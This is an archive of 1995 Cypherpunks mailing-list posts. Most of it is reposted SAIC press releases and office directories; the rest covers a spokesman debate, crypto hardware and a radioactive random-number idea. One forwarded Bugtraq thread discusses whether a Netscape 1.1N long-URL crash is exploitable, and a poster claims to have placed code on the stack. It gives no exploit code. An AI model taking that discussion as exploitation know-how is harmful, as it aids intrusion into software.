Audit Reduction and Misuse Detection in Heterogeneous Environments: Framework and Application (Macintosh Microsoft Word 5.1 file, 464K).
_________________________________________________________________
Last updated on 07-10-95

From anonymous at freezone.remailer Sat Sep 30 04:13:37 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:13:37 PDT
Subject: SAIC Acquires Network Solutions
Message-ID: <199509301113.HAA21552@light.lightlink.com>

URL: http://www.saic.com/corporate/news/news03-15-95.html

*** About SAIC ***
_________________________________________________________________

SAIC ACQUIRES NETWORK SOLUTIONS, INC.

(MCLEAN, VA) March 15, 1995 -- Science Applications International Corporation (SAIC) has acquired Network Solutions, Inc., a world leader in networking technology and applications. Network Solutions, Inc. is headquartered in Herndon, Virginia and will become a wholly owned subsidiary of SAIC. Terms of the acquisition were not disclosed.

Network Solutions, Inc. was established in 1979 and has major clients in the federal government market, state and local market, and commercial market. Network Solutions, Inc.
manages the worldwide registration services for the Internet and has significant expertise in local and wide area interoperability technologies. Network Solutions, Inc. currently supports two major Network Information Centers: The InterNIC and the Defense Data Network NIC.

"The addition of Network Solutions, Inc. to SAIC brings a world-class networking business into our growing complex of communications and computing capability," said Dr. J. Robert Beyster, founder, chairman and chief executive officer of SAIC. "We see growth in this market segment as unlimited for us in the future."

"We are extremely pleased to have Network Solutions, Inc. joining one of the most dynamic and successful growth firms in the world," said Emmit J. McHenry, chief executive officer of Network Solutions, Inc. "We anticipate explosive growth as we combine our networking expertise and experience with SAIC, a recognized leader in information technology and systems integration. The size and scope of SAIC will allow us to deliver our recognized excellence to a worldwide market."

"The acquisition of Network Solutions, Inc. is the key next step in our strategy of building a full spectrum, full service global information technology business," said Michael A. Daniels, senior vice president and general manager of the Technology Applications Sector of SAIC. "We now work with clients on major engagements in the federal government market, the commercial market, and the state and local government market in both the United States and overseas. With the acquisition of Network Solutions, Inc. we complete the technology offering of our Systems and Network Integration line of business."

SAIC is the largest employee-owned, high technology services and products company based in the United States. SAIC has annual revenues of $1.9 billion, 20,000 employees and over 300 office locations around the world.
High technology services and products are focused in the core lines of business of information technology, systems integration, energy, environment, medical and health care systems and transportation. Founded in 1969, SAIC has completed its 26th consecutive year of record revenue and earnings.
_________________________________________________________________
Last updated on 07-05-95

From anonymous at freezone.remailer Sat Sep 30 04:16:25 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:16:25 PDT
Subject: SAIC Shows Crime-Fighting Technology
Message-ID: <199509301116.HAA21636@light.lightlink.com>

URL: http://www.saic.com/corporate/news/news03-17-95.html

*** About SAIC ***
_________________________________________________________________

SAIC SHOWS CRIME-FIGHTING TECHNOLOGY

(SAN DIEGO, CA) March 17, 1995 -- Illegal contraband hidden in trucks, boats and airplanes can be detected with the assistance of state-of-the-art technology developed by Science Applications International Corporation (SAIC). The portable system is being demonstrated Friday as part of the opening of the federal Border Research and Technology Center at the Otay Mesa port-of-entry.

The center, which has been established through the efforts of San Diego U.S. Attorney Alan D. Bersin, will be the focal point for driving the design, development, manufacture and acquisition of specialized law-enforcement technologies. The center is expected to identify specific programs for development that could be used by a variety of law-enforcement agencies. Various technologies for fighting cross-border crime will be demonstrated during a mock Otay border crossing by a driver attempting to evade the law.

San Diego-based SAIC's portable contraband detection system scans inaccessible areas such as wheel wells, bumpers, boat hulls and aircraft fuselages.
The system uses a micro-processor, a self-contained low-level radioactive source and a sensitive detector. As surfaces are scanned, concealed objects including weapons, narcotics, alcohol and explosives reflect the radiation, which is sensed by the detector. The system operator is alerted by both a backlit digital display, visible in all light conditions, and an audio beeper that increases in rate as the contraband is detected. The handheld system's total weight is about two pounds.

SAIC also will show how vehicles can be "tagged" by radio transponders which can provide positive identification of cars, trucks or trains passing through a specific area. Already in use by several SAIC-equipped automated toll collection systems across the U.S., the transponders or "tags" are issued to specific vehicles. Attached to bumpers or placed on dashboards, the tags are read as the vehicle passes near an antenna installed over or at the side of the roadway. The signal is displayed on a computer screen, and the data is stored and available for further use.

The system could be used to speed commuters or other law-abiding vehicles regularly crossing the border. Violators can be caught because the "smart" system senses when a vehicle crosses without a tag, and can trigger alarms, crossing gates or other barriers, as well as recording the violator on video tape. Operators can electronically enhance license plate photos to be read clearly and process enforcement action.

"We at SAIC are encouraged by the opening of the Border Research Technology Center today. This Center will provide the opportunity to apply high-technology solutions in support of increased trade as a result of NAFTA as well as support national law enforcement efforts at the border," said Dr. Donald M. Kerr, executive corporate vice president of SAIC.

SAIC also provides other vehicle tracking systems that can trace the movements of railroad cars and detect motorists who evade barriers such as railroad grade crossings.
The high-technology company also has developed methods of tracing small motorized boats, submersibles and even swimmers crossing strategic waterways, as well as other imaging applications.

SAIC provides services and products to government and the private sector in the areas of law enforcement, transportation, energy, environment, health care and systems integration. With annual revenues of $1.9 billion, the company and its subsidiaries have nearly 20,000 employees and more than 300 locations worldwide.
_________________________________________________________________
Last updated on 07-05-95

From anonymous at freezone.remailer Sat Sep 30 04:19:06 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:19:06 PDT
Subject: SAIC's FBI ID System
Message-ID: <199509301118.HAA21682@light.lightlink.com>

URL: http://www.saic.com/corporate/news/news8-23-94.html

*** About SAIC ***
_________________________________________________________________

SAIC TEAM TO DEVELOP MULTIMILLION-DOLLAR FBI IDENTIFICATION SYSTEM

(MCLEAN, VA) August 23, 1994 -- SAIC (Science Applications International Corporation) has won a major contract to design and develop the FBI's Interstate Identification Index computer system. This system is an on-line criminal history database which will support federal, state, and local law enforcement agencies via the National Crime Information Center network.

Under the 8-year contract, the SAIC team will design, implement, and provide operations and maintenance support for the Interstate Identification Index. The contract has an estimated value of $27.6 million.

"The Interstate Identification Index project contributes to our company's goals to provide quality technical products and services for the security and well-being of our nation," said SAIC Project Manager Shelley Parker.
"SAIC has been working for the FBI in this area for the last 10 years. Our expertise and personal commitment to this program made it particularly important to the company." Development and integration work will be performed in SAIC's Software and System Integration Group in the McLean, VA facility by a team of engineers who have worked for many years on this application. The team will be augmented by new staff members with specialized expertise for the new system. SAIC provides innovative services and products to government and the private sector in the areas of systems integration, energy, environment and transportation. The company, which is the largest employee-owned high-technology firm in the nation, has annual revenues of $1.67 billion and 16,000 employees in more than 250 locations worldwide. _________________________________________________________________ Copyright SAIC Home _________________________________________________________________ Last updated on 07-05-95 From anonymous at freezone.remailer Sat Sep 30 04:33:30 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Sat, 30 Sep 95 04:33:30 PDT Subject: SAIC in VA Message-ID: <199509301133.HAA22001@light.lightlink.com> URL: http://www.saic.com/business/locations/va.html **** Business Directory **** _________________________________________________________________ SAIC IN VIRGINIA * Alexandria + Alexandria/Eisenhower Ave. (Loc. 238) + Alexandria/DMSO (Loc. 692) + Alexandria/DTG (Loc. 691) + Alexandria/JHK (Loc. 801) + Alexandria/MARITIME SERV DIV (Loc. 365) + Alexandria/TSC (Loc. 694) + Washington D.C./AMSEC (Loc.347) * Arlington + Arlington/Jefferson Davis HWY (Loc. 294) + Arlington/AMSEC (Loc. 678) + Arlington/BALLSTON (Loc. 765) + Arlington/CAPS (Loc. 785) + Arlington/CM (Loc. 573) + Arlington/CON. SUP. Facility (Loc. 964) + Arlington/CSI ADV. APP. DIV. (Loc. 963) + Arlington/CSM & AT (Loc. 402) + Arlington/CSS (Loc. 309) + Arlington/FSD (Loc. 784) + Arlington/ICITAP (Loc. 
769) + Arlington/LEO (Loc. 587) + Arlington/MOSES (Loc. 612) + Arlington/RDO (Loc. 783) + Arlington/SAI T (Loc. 329) + Arlington/SCT (Loc. 830) + Arlington/SEM (Loc. 711) + Arlington/SIM. TECH (Loc. 717) + Arlington/SIM. TECH (Loc. 990) + Arlington/TRG (Loc. 539) + Arlington/TRG (Loc. 668) + Arlington/TTG (Loc. 708) + Crystal City (Loc. 508) + Virginia Square/ATG (Loc. 215) * Dahlgren + Dahlgren/Danube Drive (Loc. 226) + Dahlgren/AMSEC (Loc. 716) * Chantilly + Chantilly/NSI (Loc. 944) * Falls Church + Falls Church/EHSG (Loc. 052) + Falls Church/HCTG (Loc. 456) + Falls Church/SKYLINE/TAG (Loc. 284) * Ft. Belvoir + Ft. Belvoir (Loc. 709) * Hampton + Hampton/Enterprise Parkway (Loc. 761) + Hampton/Enterprise Parkway (Loc. 833) + Hampton/Enterprise Parkway (Loc. 256) + Hampton/Command & Control (Loc. 550) + Hampton/NASA LANGLEY (Loc. 618) * Herndon + Herndon/TAG (Loc. 946) * King George + King George/NAVSWC (Loc. 924) * Lynchburg + Lynchburg/Timberlake Road (Loc. 212) * McLean + McLean (Loc. 049) + McLean/COMSYSTEMS (Loc. 092) + McLean/ENTERPRISE CENTER (Loc. 747) + McLean/TE&A (Loc. 741) + McLean/TOWER (Loc. 015) * Newington + Newington/CVR (Loc. 474) * Norfolk + Norfolk/Plume Street (Loc. 441) + Norfolk/RE WRIGHT (Loc. 931) * Petersburg + Petersburg/NSSSG (Loc. 638) * Portsmouth + Tidewater/CHCS (Loc. 649) * Reston + Reston/EITS (Loc. 641) * Richmond + Richmond/NSI (Loc. 951) * Virginia Beach + Virginia Beach/SEG (Loc. 282) + Corp Office/AMSEC (Loc. 
346)

Copyright SAIC

Last updated on 09-07-95

From anonymous at freezone.remailer Sat Sep 30 04:35:27 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:35:27 PDT
Subject: SAIC in MD
Message-ID: <199509301135.HAA22051@light.lightlink.com>

URL: http://www.saic.com/business/locations/md.html

**** Business Directory ****

SAIC IN MARYLAND

* Abingdon
  + Abingdon/Continental Drive (Loc. 591)
* Annapolis
  + Annapolis/TRG (Loc. 178)
  + Annapolis/WOR (Loc. 241)
* Baltimore
  + Baltimore/White Marsh (Loc. 221)
* Bethesda
  + Bethesda/CHCS (Loc. 498)
* California
  + California/SCT (Loc. 827)
* Columbia
  + Columbia/Ideas Group (Loc. 905)
  + Columbia/MSO (Loc. 473)
  + Columbia/SSIG (Loc. 315)
* Fort Ritchie
  + Ft. Ritchie (Loc. 700)
* Frederick
  + Frederick (Loc. 519)
  + Frederick/FCRDC (Loc. 970)
  + Frederick/PAI (Loc. 512)
  + Frederick/PAI Admin. Office (Loc. 575)
  + Frederick/Spectrum Drive (Loc. 750)
* Gaithersburg
  + Gaithersburg/Professional Drive (Loc. 134)
  + Gaithersburg/QUINCE DIAMOND (Loc. 725)
  + Gaithersburg/UTILITY SVCS (Loc. 555)
* Germantown
  + Germantown/Century Blvd. (Loc. 292)
  + Germantown/BELLEMEADE III (Loc. 854)
* Hagerstown
  + Hagerstown/DTG (Loc. 652)
* Hanover
  + Hanover/Ashton Road (Loc. 745)
* Joppatowne
  + Joppatowne/SAIC (Loc. 220)
  + Joppatowne/TDG (Loc. 303)
* Lanham
  + Maryland/SYNTONIC (Loc. 860)
* Laurel
  + Laurel/GSC (Loc. 661)
* Rockville
  + Rockville/NSI (Loc. 953)
* Silver Spring
  + Silver Spring/ADELPHI (Loc. 908)
  + Silver Spring/WHITE OAK (Loc. 563)
* Towson
  + Towson/JHK (Loc. 803)
* Westminster
  + Westminster/RE WRIGHT (Loc. 930)

Last updated on 09-07-95

From anonymous at freezone.remailer Sat Sep 30 04:44:17 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:44:17 PDT
Subject: SAIC Global Web
Message-ID: <199509301144.HAA22231@light.lightlink.com>

URL: http://www.saic.com/business/locations/index.html

*** Business Directory ***

U.S. Locations Alphabetical List

o Alabama
o Alaska
o Arizona
o Arkansas
o California
o Colorado
o Connecticut
o Delaware
o Florida
o Georgia
o Hawaii
o Idaho
o Illinois
o Indiana
o Kansas
o Kentucky
o Louisiana
o Maryland
o Massachusetts
o Michigan
o Minnesota
o Mississippi
o Missouri
o Montana
o Nebraska
o Nevada
o New Hampshire
o New Jersey
o New Mexico
o New York
o North Carolina
o North Dakota
o Ohio
o Oklahoma
o Oregon
o Pennsylvania
o Rhode Island
o South Carolina
o South Dakota
o Tennessee
o Texas
o Utah
o Virginia
o Washington
o Washington D.C.
o West Virginia
o Wisconsin
o Wyoming

Last updated on 07-05-95

----------

URL: http://www.saic.com/business/locations/others.html

*** Business Directory ***

International Locations Alphabetical List

CANADA
* Halifax
* Montreal
* Ottawa
* Vancouver

COLOMBIA
* Colombia, LTDA.

FRANCE
* Paris La Defense/EUROPE (Loc. 596)

GERMANY
* Germany
* Kaiserslautern/SCT (Loc. 826)
* Landstuhl/CHCS

HONG KONG
* Hong Kong (Loc. 789)

ICELAND
* Keflavik/CHCS

MEXICO
* Mexico City

RUSSIA
* Moscow/MIR (Loc. 764)

SPAIN
* IBERSAIC (Loc. 693)

UNITED KINGDOM
* Aberdeen (Loc. 797)
* Aberdeen/SAIC Ltd (Loc. 728)
* Birmingham
* Camberly UK/SAIT (Loc. 666)
* Cambridge/TOP EXPRESS (Loc. 340)
* IBM SAIC (Loc. 667)
* London/Andrew Palmer (Loc. 798)
* Meriden (Loc. 865)
* Stockley Park (Loc. 884)

Last updated on 07-05-95

From anonymous at freezone.remailer Sat Sep 30 04:47:48 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:47:48 PDT
Subject: SAIC in CA
Message-ID: <199509301147.HAA23372@light.lightlink.com>

URL: http://www.saic.com/business/locations/ca.html

**** Business Directory ****

SAIC IN CALIFORNIA

* Anaheim
  + Anaheim/JHK (Loc. 807)
* APO AP
  + Guam/Naval Hospital/CHCS (Loc. 984)
  + Japan/ETG (Loc. 427)
  + Japan/Misawa AB/CHCS (Loc. 987)
  + Japan/Okinawa/USNH/CHCS (Loc. 986)
  + Japan/Yokosuka/CHCS (Loc. 601)
  + Japan/Yokota AB/CHCS (Loc. 988)
  + Korea/COMSYS (Loc. 740)
  + Korea/ETG (Loc. 426)
  + Korea/Kunsan AB/CHCS (Loc. 576)
  + Korea/Osan AB/CHCS (Loc. 985)
* Burlingame
  + Burlingame/EPRI (Loc. 721)
* Camarillo
  + Camarillo/Camino Ruiz (Loc. 161)
* Camp Pendleton
  + Camp Pendleton/CHCS (Loc. 818)
* Cardiff
  + Cardiff/ATLAS (Loc. 790)
* Citrus Heights
  + Citrus Heights/NSI (Loc. 956)
* Corona
  + Corona/AMSEC (Loc. 262)
* Cupertino
  + Cupertino/Baywood Drive (Loc. 636)
* Edwards AFB
  + Edwards AFB/CHCS (Loc. 883)
* El Segundo
  + El Segundo/ASP (Loc. 328)
* Emeryville
  + Emeryville/Berkeley/DTG (Loc. 251)
  + Emeryville/JHK (Loc. 804)
* Fort Irwin
  + Fort Irwin/CHCS (Loc. 782)
* Fountain Valley
  + Fountain Valley/MSO (Loc. 57)
* Goleta
  + Goleta/MARIPRO (Loc. 182)
* Laguna Hills
  + Laguna Hills/DTG (Loc. 331)
* La Jolla
  + La Jolla/Cave Street (Loc. 450)
  + La Jolla/1200 Prospect (Loc. 626)
  + La Jolla/1299 Prospect (Loc. 544)
  + La Jolla/ITER (Loc. 623)
* Lancaster
  + Lancaster (Loc. 938)
* Lawndale
  + Lawndale/SCT (Loc. 823)
* Lemoore
  + Lemoore/CHCS (Loc. 781)
* Los Altos
  + Los Altos/El Camino Real (Loc. 008)
* Los Angeles
  + Los Angeles AFB/CHCS (Loc. 885)
  + Los Angeles/Century City (Loc. 124)
  + Los Angeles/UCLA/Div. 284 (Loc. 605)
* McClellan
  + McClellan AFB/TTG (Loc. 787)
* Moffett Field
  + Moffett Field (Loc. 834)
  + Moffett Field (Loc. 920)
  + Moffett Field (Loc. 922)
* Monterey
  + Monterey/Camino El Estero (Loc. 098)
* Oxnard
  + Oxnard/AMSEC (Loc. 159)
* Palo Alto
  + Palo Alto/SCT (Loc. 829)
* Pasadena
  + Pasadena/JHK (Loc. 805)
* Pleasanton
  + Pleasanton/Hopyard Road (Loc. 029)
* Poway
  + Poway (Loc. 962)
* Pt. Hueneme
  + Pt. Hueneme/CHCS (Loc. 841)
* Ridgecrest
  + Ridgecrest/STG (Loc. 336)
* Riverside
  + Riverside/JHK (Loc. 810)
  + Riverside/NSI (Loc. 955)
* San Bernardino
  + San Bernardino/NSI (Loc. 945)
* Sacramento
  + Sacramento/LEO (Loc. 580)
* San Diego
  + San Diego/AMSEC (Loc. 348)
  + San Diego/Campus Pt. A (Loc. 245)
  + San Diego/Campus Pt. C (Loc. 001)
  + San Diego/Campus Pt. D (Loc. 094)
  + San Diego/Campus Pt. E (Loc. 461)
  + San Diego/Campus Pt. F (Loc. 399)
  + San Diego/Campus Pt. G (Loc. 599)
  + San Diego/Campus Pt. K (Loc. 548)
  + San Diego/CHCS (Loc. 703)
  + San Diego/ESG (Loc. 973)
  + San Diego/Fourwinds (Loc. 312)
  + San Diego/MARITIME SERV DIV (Loc. 363)
  + San Diego/MEG (Loc. 677)
  + San Diego/MTO (Loc. 408)
  + San Diego/Old Town (Loc. 552)
  + San Diego/SAIC (Loc. 218)
  + San Diego/SAI T/Campus Pt. B (Loc. 291)
  + San Diego/SAI T/STPG (Loc. 358)
  + San Diego/SCRIPPS (Loc. 869)
  + San Diego/SED(668)/FCTCPAC (Loc. 673)
  + San Diego/SEG (Loc. 332)
  + San Diego/Wateridge (Loc. 021)
  + Sorrento Valley/(CSG) MANUFACTURING (Loc. 553)
  + Sorrento Valley/REC RES RET (Loc. 413)
  + Sorrento Valley/REMOTE SYS FAC (Loc. 337)
  + Sorrento Valley/SAI T (Loc. 002)
  + Sorrento Valley/SEA (Loc. 676)
* San Francisco
  + San Francisco/JDA (Loc. 933)
  + San Francisco/TSC (Loc. 457)
* San Jose
  + San Jose/C&I (Loc. 333)
* Santa Barbara
  + Santa Barbara/Ekwill Street (Loc. 216)
  + Santa Barbara/State Street (Loc. 786)
  + Santa Barbara/CSG (Loc. 431)
  + Santa Barbara/PSG (Loc. 439)
* Santa Clara
  + Santa Clara/Patrick Henry Drive (Loc. 007)
* Santa Ynez
  + Santa Ynez/Sagunto Street (Loc. 420)
* Thousand Oaks
  + Thousand Oaks/DTG (Loc. 730)
* Torrance
  + Torrance/Western Avenue (Loc. 005)
* Travis AFB
  + David Grant USAF MED CTR/CHCS (Loc. 671)
* Vallejo
  + Vallejo/COMSYS (Loc. 243)
* Vandenberg AFB
  + Vandenberg AFB (Loc. 598)
  + Vandenberg AFB/CHCS (Loc. 882)
* Walnut Creek
  + Walnut Creek/HCTG (Loc. 518)
* Woodland Hills
  + Woodland Hills/JHK (Loc. 811)

Last updated on 09-07-95

From anonymous at freezone.remailer Sat Sep 30 04:51:14 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:51:14 PDT
Subject: SAIC Directors
Message-ID: <199509301151.HAA23472@light.lightlink.com>

URL: http://www.saic.com/corporate/annual-reports/1995/directors.html

Board of Directors

* J.R. Beyster, Chairman of the Board and Chief Executive Officer, SAIC
* L.A. Kull, President and Chief Operating Officer, SAIC
* A.L. Alm, Sector Vice President, SAIC
* V.N. Cook, Chairman, Visions International, Inc.
* S.J. Dalich, Executive Vice President, SAIC
* C.K. Davis, International Health Care Consultant
* W.H. Demisch, Managing Director, BT Securities Corp.
* E.A. Frieman, Director, Scripps Institution of Oceanography; Vice Chancellor of Marine Sciences, UCSD
* J.E. Glancy, Corporate Executive Vice President, SAIC
* F. Herwood, SAIC Director Emeritus
* D.A. Hicks, Chairman, Hicks & Associates, a subsidiary of SAIC
* B.R. Inman, Admiral, USN (Ret.)
* D.M. Kerr, Corporate Executive Vice President, SAIC
* M.R. Laird, Senior Counselor, National and International Affairs, The Readers Digest Association Inc.
* W.M. Layson, Senior Vice President, SAIC
* C.B. Malone, President, Financial & Management Consulting Inc.
* J.W. McRary, President and Chief Executive Officer, Microelectronics and Computer Technology Corp.
* B.J. Shillito, SAIC Director Emeritus
* E.A. Straker, Executive Vice President, SAIC
* M.R. Thurman, General, USA (Ret.)
* M.E. Trout, Chairman Emeritus, American Healthcare Systems
* J.H. Warner, Jr., Executive Vice President, SAIC
* J.A. Welch, General, USAF (Ret.)
* J.B. Wiesler, Vice Chairman, Bank of America (Ret.)
* W.E. Zisch, SAIC Director Emeritus

From anonymous at freezone.remailer Sat Sep 30 05:00:40 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 05:00:40 PDT
Subject: SAIC in DC
Message-ID: <199509301200.IAA23661@light.lightlink.com>

URL: http://www.saic.com/business/locations/dc.html

**** Business Directory ****

SAIC IN WASHINGTON D.C.

* P.O.S.T. (Loc. 126)
* Walter Reed/CHCS (Loc. 497)
* Walter Reed/GOV'T AFFAIRS (Loc. 235)
* Washington D.C./SEASG (Loc. 288)
* Washington D.C./CHEMONICS XPT (Loc. 821)
* Washington D.C./ITG (Loc. 704)
* Washington D.C./NSI (Loc. 969)
* Washington D.C./OCRW (Loc. 482)
* Washington D.C./QATSS HQ (Loc. 729)
* Washington D.C./TCI (Loc. 991)

Last updated on 07-06-95

From ASICEO at internetMCI.COM Sat Sep 30 07:22:21 1995
From: ASICEO at internetMCI.COM (FELIX R. WILSON SR.)
Date: Sat, 30 Sep 95 07:22:21 PDT
Subject: Operation Stop The Aliens
Message-ID: <01HVVTH9ORWY8ZEKWD@MAILSRV1.PCY.MCI.NET>

-- [ From: FELIX R. WILSON SR. * EMC.Ver #2.3 ] --

Attachment: natltr.txt Code: 00H7GFL \ Created: 09-29-95, 06:21 PM [34 Kb]

The attached file is for viewing in text format. Please forward to everyone on the network, and post to every board. "Please.."
//BEGIN BINARY MAIL SEGMENT: begin 644 natltr.txt

Message-ID: <199509301557.LAA03540@clark.net>

> Forwarded message:
> From owner-bugtraq at crimelab.com Thu Sep 28 19:58:59 1995
> Approved-By: CHASIN at CRIMELAB.COM
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Approved-By: Neil Woods
> Message-ID: <199509280324.EAA19959 at legless.demon.co.uk>
> Date: Thu, 28 Sep 1995 04:24:06 +0100
> Reply-To: Bugtraq List
> Sender: Bugtraq List
> From: Neil Woods
> Subject: Re: Ray Cromwell: Another Netscape Bug (and possible security
> X-To: BUGTRAQ at CRIMELAB.COM
> X-cc: 8lgm at bagpuss.demon.co.uk
> To: Multiple recipients of list BUGTRAQ
> In-Reply-To: <199509260045.OAA12377 at hookomo.aloha.net> from "Timothy Newsham"
> at Sep 25, 95 02:45:26 pm
>
> > > >On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> > > >fault and subsequent coredump. GDB reports nothing useable (stripped
> > > >executable)
> > >
> > > I cannot reproduce this bug on the following platforms:
> > >
> > > Solaris 2.5 beta/Netscape 1.1N
> >
> > I've reproduced it fine under sol2.4 1.1N. The page
> > I tested from is http://www.aloha.net/~newsham/test.html.
> > Simply click on the long test url and core dump.
> > (You can view source before clicking to see what you
> > are clicking on if you don't trust me :)
> >
> > > Howard Owen hbo at octel.com Octel Communications Corporation 1024/DC671C31 =
>
> I've tried this url, it does indeed core dump.
>
> Just had a quick look at the core. From first impressions, it's a global
> overwrite.
> Therefore we're not overwriting a flushed stack frame, so a
> syslog(3) style exploit is impossible.
>
> Global overwrites can be exploited, but due to the scenario we're looking
> at, I'd consider exploit chances to be very low indeed.

It's not a global overwrite on my system. It is very definitely a stack frame overwrite. I've already put code on my stack using a URL so I know it's a stack problem.

From sandfort at crl.com Sat Sep 30 08:59:48 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Sat, 30 Sep 95 08:59:48 PDT
Subject: Cypherpunks Press release
In-Reply-To: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 30 Sep 1995, Jiri Baum wrote:

> It seems to me that there are two viewpoints,
> * a spokesman would be useful, and
> * a spokesman cannot be appointed due to lack of org
>
> Which both seem to be true to me . . .

Well, neither seems true to me. I don't see how, in the first analysis, a spokesman would be useful to ME. I am a Cypherpunk by virtue of being on the mailing list, but I doubt most, and certainly not all, list members would agree with everything I believe about privacy, encryption, freedom and the government. I know I don't believe in a lot of the stuff I read here. Why would any of us want a spokesman other than themselves? So I ask, "useful" to whom?

Second, the reason a spokesman cannot be appointed is not due to lack of [an?] organization, but rather the lack of any unifying credo or statement of belief. Had the list founders said, "Cypherpunks is a list for people who believe X, Y and Z. Sign up if you are one of us," then we might have an "official" viewpoint which a spokesperson could help articulate. They didn't, we don't and, frankly, that's the way I like it.

You want to express your views to the press? Knock yourself out. You want to call yourself a "Cypherpunk"? No one will stop you. You want to characterize what other Cypherpunks say and believe? You might say something I disagree with, but again, no one will stop you. (Of course, they may counter your free speech with some free speech of their own, but that's the name of the game.)

Yours in anarchy,

 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From rfb at lehman.com Sat Sep 30 09:00:15 1995
From: rfb at lehman.com (Rick Busdiecker)
Date: Sat, 30 Sep 95 09:00:15 PDT
Subject: Electronic junk mail
In-Reply-To:
Message-ID: <9509301557.AA23377@cfdevx1.lehman.com>

-----BEGIN PGP SIGNED MESSAGE-----

    Date: Fri, 29 Sep 1995 16:54:43 -0700 (PDT)
    From: Syed Yusuf

    I just received an electronic junkmail! . . . Cypher punks to the rescue?
    my privacy has been violated anyone got any ideas besides just putting
    each individual into my kill file?

Well, it's not a perfect solution and it might not have done anything in this particular case, however the amount of electronic junk mail has dropped close to zero since I added ``Please do not send electronic junk mail!'' to my signature.

	Rick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG1o25NR+/jb2ZlNAQE5RwP/fPlJnpSCqV7YoA2vi8DAwW6m7bzNwmG7
ZH5mciCIvlrdL1Ua0ERVsiqmcXDE5lvU7aYigexBzedUX+q8E67St87gKEuXLkNa
tGNdOlDHb+JwUVfyUWXrHTHVkCgK//MIdToEypkLLv5stG0mHwwh2lf/SZgEPisk
YZJs/btH/TU=
=FO6+
-----END PGP SIGNATURE-----

--
Rick Busdiecker                          Please do not send electronic junk mail!
net: rfb at lehman.com or rfb at cmu.edu      PGP Public Key: 0xDBD9994D
www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code. Breaking into systems is `cracking'.

From jamesd at echeque.com Sat Sep 30 10:05:25 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sat, 30 Sep 95 10:05:25 PDT
Subject: Cypherpunks Press release
Message-ID: <199509301705.KAA24620@blob.best.net>

At 05:26 PM 9/30/95 +1000, Jiri Baum wrote:
>All that is needed then is someone with a fax machine to volunteer
>to receive the fax, type it in and summarise the response afterwards
>(noting points on which there was disagreement, and who disagreed
>in what way).

Let the dim bulbs subscribe to the list themselves. If they are not capable of that, they will not make any intelligent reports on it anyway.

 ---------------------------------------------------------------------
 | We have the right to defend ourselves      | http://www.jim.com/jamesd/
 and our property, because of the kind       |
 of animals that we are. True law            | James A. Donald
 derives from this right, not from the       |
 arbitrary power of the state.               | jamesd at echeque.com

From cman at communities.com Sat Sep 30 10:43:08 1995
From: cman at communities.com (Douglas Barnes)
Date: Sat, 30 Sep 95 10:43:08 PDT
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID:

Simon--

There is a lot more to cryptography hardware than just making stuff go fast. Any kind of co-processor array could handle the job -- doesn't have to be DSPs. For unsigned integer math, the 486 DX4/100 is a perfectly decent chip, and prices are plummeting. If all you want is to make RSA go fast, you can rack up as many of these as you want, and do your work at Ethernet speeds (which should be more than fast enough for the foreseeable future.) Also, you get to use your old familiar (and inexpensive) programming tools to write your code.

It also turns out that when you're actually using cryptography to do valuable stuff, a lot of other concerns are just as important as speed -- in particular, physical security over the private keys. Most server-oriented cryptography add-ins are highly tamper-resistant units that can only be re-keyed when some sort of dongle is attached.
Said dongle can be kept much more securely than a whole computer. Although other threats still remain, this substantially reduces the threat of key compromise.

Incidentally, good hardware of this sort uses ASICs that give substantially more bang for the buck than the DSP solutions you're suggesting. Certainly messing around with DSPs is fun -- I've done it and enjoyed it -- but I don't think they will ever be significant as cryptographic co-processors.

>That's another question. A DSP chip can also be used for crypto - yet
>sound cards and nexts aren't ITARed, and aren't really considered
>dual-use. A Modular exponentiator isn't a crypto device (hey -
>it's a bignum accelerator for Mathematica). Now, if I had a pipelined
>WSI chip capable of delivering one result per cycle, I could think of
>some useful applications, but ...
>
>Simon

From zinc at zifi.genetics.utah.edu Sat Sep 30 10:46:10 1995
From: zinc at zifi.genetics.utah.edu (zinc)
Date: Sat, 30 Sep 95 10:46:10 PDT
Subject: Simple Hardware RNG Idea
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

howdy cpunks,

regarding the use of radioactive material for generating random numbers, lantern mantles are fairly radioactive. i'd say they would be able to emit sufficient particles for OTP use, especially if one builds a device that just constructs the pads all the time (i.e., it just sits there making various pads of X min length and Y max length, storing them on a hard drive, or RAM if you're that rich). you just request a pad from the machine when you need it and encrypt whatever with it...

- -pjf

patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

